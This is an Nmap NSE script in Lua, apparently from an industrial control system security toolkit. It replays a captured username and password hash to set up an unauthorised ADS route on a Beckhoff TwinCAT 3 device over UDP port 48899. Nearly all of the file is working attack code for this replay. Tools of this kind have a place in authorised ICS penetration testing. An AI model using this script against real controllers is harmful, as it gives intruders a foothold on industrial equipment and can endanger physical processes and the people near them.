local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local ads = require "ads"
local nsedebug = require "nsedebug"

description = [[
  Uses a captured username / password hash to setup an ADS-route on a TwinCAT 3 device.
]]
-- 2015-06-23 Joel Spang, initial version

---
-- @usage
-- nmap -sU --script ads-replay <target> --script-args "username=HASH,password=HASH,route=MyRoute,encrypted=1,netid=ip.1.1"
--
-- @output
-- TODO

author = "Joel Spang"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"intrusive", "brute"}

hostrule = function() return true end

action = function(host, port) 
  local port = {
    number = 48899,
    protocol = "udp"
  }

  local args = nmap.registry.args

  local isEncrypted = args.encrypted
  if isEncrypted == nil then
    return "\n\nERROR: Not specified whether encryption should be used or not!"
  end
  isEncrypted = (tonumber(args.encrypted) == 1) or false

  local username = args.username
  if username == nil then
    return "\n\nERROR: Username was not supplied!"
  end
  if isEncrypted and (string.len(username) % 16 ~= 0) then
    return "\n\nERROR: Username is not a valid 120 bit hash!"
  end

  local password = args.password
  if password == nil then
    return "\n\nERROR: Password was not supplied!"
  end
  if isEncrypted and (string.len(password) % 16 ~= 0) then
    return "\n\nERROR: Password is not a valid 120 bit hash!"
  end

  local route = args.route or "MeineRoute"
  local netid = args.netid or false

  -- Send the route packet to the host with the hash and 
  local res = ads.send_route_establish(host, port, username, password, route, isEncrypted, netid)
  local data = {
    ["Success"] = res,
    ["Parameters"] = {
      ["Use encryption?"] = isEncrypted,
      ["Username"] = username,
      ["Password"] = password,
      ["Route"] = route
    }
  }
  
  return data
end